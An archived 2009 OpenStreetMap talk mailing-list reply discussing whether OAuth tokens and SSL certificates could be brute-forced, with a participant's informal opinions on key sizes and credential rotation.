[OSM-talk] Why doesn't OSM implement a simple measure to protect it's users and passwords?
John Smith
deltafoxtrot256 at gmail.com
Sat Dec 26 03:40:26 GMT 2009
2009/12/26 Matt Amos <zerebubuth at gmail.com>:
> it seems that SSL isn't being left alone.
I'm not in the UK so I can't test it, can anyone confirm this is
actually happening?
> given sufficiently many signatures, it's possible to brute force a
> single token with a very large amount of effort. however, this token
> doesn't give sufficient access to either create further tokens or
Lets put things into perspective here, what bit size do most OAuth
keys use? (or the tokens) unless it's up around 2048 bit it
potentially could be done on some of the GPU number crunching systems
that are about in a smallish amount of time. Depends on the reward
actually as to how much effort someone will put into breaking
something.
> change users credentials and can be easily revoked. it's also worth
> noting that it's possible to brute force SSL certificates, but again,
Yes, but to date only 56bit RSA has been broken, although that doesn't
mean something much larger can't be broken, but if it was feasible
there is still a couple of 1024bit RSA certs in older browsers, and
2048 in most current browser that haven't been broken. I'm actually
surprised some of the older RSA keys haven't been cracked to issue
valid SSL certs for scammers, but they generally don't need SSL to
commit fraud against people that hand out their personal information
willy nilly.
> with a very large amount of effort. in general, it's possible to brute
> force everything except one-time pads.
I like these for giving to remote hands...
> as with any security measure, to minimise your risk you need to be
> aware of the security horizon (which will depend on what your attack
> profile is) and change your authentication details regularly.
More information about the talk
mailing list